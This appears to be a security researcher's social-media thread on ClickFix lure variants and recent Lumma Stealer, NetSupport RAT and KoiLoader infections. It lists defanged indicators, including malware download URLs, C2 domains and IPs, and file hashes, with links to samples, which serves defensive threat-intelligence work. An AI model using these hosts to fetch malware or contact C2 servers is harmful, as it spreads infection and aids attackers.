Mastodawn

Show thread

Brad 1d ago

#Example 3: #TermFix

I rarely see this, and I haven't yet personally documented it. So I found an image from a Google search to illustrate.

This example is from a #TermFix style #ClickFix popup asking the viewer to open a PowerShell terminal.

Show thread

Brad 1d ago

Example 2: #FileFix

As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.

It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.

Show thread

Brad 1d ago

Example 1: #RunFix

As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT

Brad 1d ago

#ClickFix is a social engineering technique that uses fake verification pages and clipboard hijacking to convince people to click and keyboard stroke their way to an infection. So let's categorize #FileFix properly in the pantheon of ClickFix Attacks.

FileFix: A ClickFix page that asks you to past script into a File Manager window.

#RunFix: A ClickFix page that asks you to paste script into a Run window

#TermFix: A ClickFix page that asks you to paste script into a terminal window (cmd.exe console or PowerShell terminal).

We cool with that? Any others types I'm missing?

Brad 1d ago

2025-07-02 (Wednesday): Another #LummaStealer infection with follow-up #Rsockstun #malware.

The #Lumma Stealer infection uses a password-protected 7-zip archive, a NullSoft installer, and #AutoItv3.

Malware samples, a #pcap and some IOCs are available at https://www.malware-traffic-analysis.net/2025/07/02/index.html

Brad Jun 27

2025-06-27 (Friday): I ran another #LummaStealer infection today. It was basically the same as yesterday, except for the follow-up malware.

I saw the same URL for hxxp[:]//86.54.25[.]40/sok.exe, but it returned a different file.

It generated the same type of C2 traffic over TCP port 16443, but it used a different domain for the C2 server at eset-blacklist[.]net.

Sample:

- https://bazaar.abuse.ch/sample/9dc1872510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/

Sandbox analysis:

- https://www.joesandbox.com/analysis/1724473

- https://tria.ge/250627-26apgask14

- https://app.any.run/tasks/651d4998-807d-4ac2-821b-88061c288013

Brad Jun 27

2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT

URL sequence leading to ClickFix:

- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa

URL sequence after running ClickFix script:

- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928

SHA256 hash for smks.zip archive containing NetSupport RAT package:

3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5

NetSupportRAT C2: 185.163.45[.]30:443

cc: @monitorsg

Brad Jun 27

2025-06-26 (Thursday): #LummaStealer infection leads to follow-up loader that retrieves a pen test tool hosted on Github and configures it as #malware.

A #pcap of the infection traffic, the associated malware, and IOCs are available at: https://www.malware-traffic-analysis.net/2025/06/26/index.html

#Lumma

Brad Jun 21

2025-06-21 (Saturday): #KoiLoader / #KoiStealer infection.

A #pcap of the infection traffic, associated malware/files, and some of the indicators are available at https://www.malware-traffic-analysis.net/2025/06/21/index.html

Brad Jun 21

025-06-20 (Friday): From a post I wrote for my employer on other social media about distribution of #malware disguised as cracked software.

The malware is contained in password-protected 7-Zip archives to avoid detection.

A #pcap from running the malware, and the associated malware files are available at https://www.malware-traffic-analysis.net/2025/06/20/index.html

I don't know what this malware is, so if anyone knows, feel free to reply. I'm just here for the memes.